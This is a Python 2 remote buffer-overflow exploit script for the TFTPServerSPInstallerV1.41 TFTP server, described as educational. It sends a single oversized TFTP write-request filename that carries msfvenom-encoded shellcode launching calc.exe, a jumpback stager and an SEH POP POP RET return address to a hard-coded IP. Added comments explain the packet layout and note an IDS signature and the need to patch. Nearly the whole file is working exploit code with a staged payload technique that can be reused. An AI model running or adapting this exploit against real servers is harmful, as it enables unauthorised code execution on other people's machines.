Remote BoF for TFTPServerSPInstallerV1.41
#!/usr/bin/python
# Remote BoF for TFTPServerSPInstallerV1.41.
# Dev/Modified by r00tpgp for educational purposes, taken off orginal tftpd exploit by muts
#
# Python 2 script (uses the `print` statement): builds a single TFTP write
# request (WRQ, opcode 2, RFC 1350) whose filename field is far longer than
# any legitimate path and sends it as one UDP datagram to a hard-coded host.
# Defender's view: the attack surface is the unbounded filename field of a
# WRQ to UDP/69; a WRQ with a ~1.5 KB filename is a clear IDS signature, and
# the fix is to patch or retire the affected server version named above.
import socket
import sys
# Target is hard-coded; there is no argv handling and no response is read.
host = '172.16.155.129'
port = 69
try:
    # UDP socket; it is never closed afterwards (process exit releases it).
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    # NOTE(review): bare except also swallows SystemExit/KeyboardInterrupt;
    # socket.error is the exception socket() actually raises.
    print "socket() failed"
    sys.exit(1)
# This is the original offset size 1496. Kept commented for reference.
#filename = "A" * 1496 + "\x4F\x48\x40" # + "\x43" * 3500 # 0040484F POP POP RET
# Evil shellcode. Pop a calculator!
#msfvenom -p windows/exec cmd=calc.exe EXITFUNC=seh -e x86/shikata_ga_nai -b "\x00\x2f" -f python
#Payload size: 220 bytes
# Encoded bytes below; the encoder was told to avoid \x00 and \x2f because
# a NUL terminates the TFTP filename field and "/" is a path separator.
buf = ""
buf += "\xbb\xf3\x84\xd0\x15\xdb\xdb\xd9\x74\x24\xf4\x5a\x29"
buf += "\xc9\xb1\x31\x31\x5a\x13\x83\xea\xfc\x03\x5a\xfc\x66"
buf += "\x25\xe9\xea\xe5\xc6\x12\xea\x89\x4f\xf7\xdb\x89\x34"
buf += "\x73\x4b\x3a\x3e\xd1\x67\xb1\x12\xc2\xfc\xb7\xba\xe5"
buf += "\xb5\x72\x9d\xc8\x46\x2e\xdd\x4b\xc4\x2d\x32\xac\xf5"
buf += "\xfd\x47\xad\x32\xe3\xaa\xff\xeb\x6f\x18\x10\x98\x3a"
buf += "\xa1\x9b\xd2\xab\xa1\x78\xa2\xca\x80\x2e\xb9\x94\x02"
buf += "\xd0\x6e\xad\x0a\xca\x73\x88\xc5\x61\x47\x66\xd4\xa3"
buf += "\x96\x87\x7b\x8a\x17\x7a\x85\xca\x9f\x65\xf0\x22\xdc"
buf += "\x18\x03\xf1\x9f\xc6\x86\xe2\x07\x8c\x31\xcf\xb6\x41"
buf += "\xa7\x84\xb4\x2e\xa3\xc3\xd8\xb1\x60\x78\xe4\x3a\x87"
buf += "\xaf\x6d\x78\xac\x6b\x36\xda\xcd\x2a\x92\x8d\xf2\x2d"
buf += "\x7d\x71\x57\x25\x93\x66\xea\x64\xf9\x79\x78\x13\x4f"
buf += "\x79\x82\x1c\xff\x12\xb3\x97\x90\x65\x4c\x72\xd5\x94"
buf += "\xbd\x4f\xc3\x01\x64\x3a\xae\x4f\x97\x90\xec\x69\x14"
buf += "\x11\x8c\x8d\x04\x50\x89\xca\x82\x88\xe3\x43\x67\xaf"
buf += "\x50\x63\xa2\xcc\x37\xf7\x2e\x3d\xd2\x7f\xd4\x41"
# Jumpback shellcode from phrack 62 article 7.
# 17 bytes.
jumpback = "\xd9\xee\xd9\x74\x24\xf4\x59\x80\xc1\x0a\x90\xfe\xcd\xfe\xcd\xff\xe1"
# Sending of staged shellcode. Read from right to left.
# Ret addr(POP POP RET) ---> 1st stage shell short jump ------> 2nd stage long jumback shellcode ---> evil buf
# Field length: 973 + 252 + 220 + 30 + 17 + 4 = 1496 bytes of filler/stages
# (matching the original offset above) followed by the 3-byte address.
filename = "\xcc" * 973 + "\x90" * 252 + buf + "\x90" * 30 + jumpback + "\xeb\xd0\x90\x90" + "\x4F\x48\x40"
# Send payload off
mode = "netascii"
# RFC 1350 WRQ layout: opcode 0x0002, filename, NUL, mode, NUL.
payload = "\x00\x02" + filename + "\x00" + mode+ "\0"
# Fire-and-forget: no reply is awaited and the socket is not closed.
s.sendto(payload, (host, port))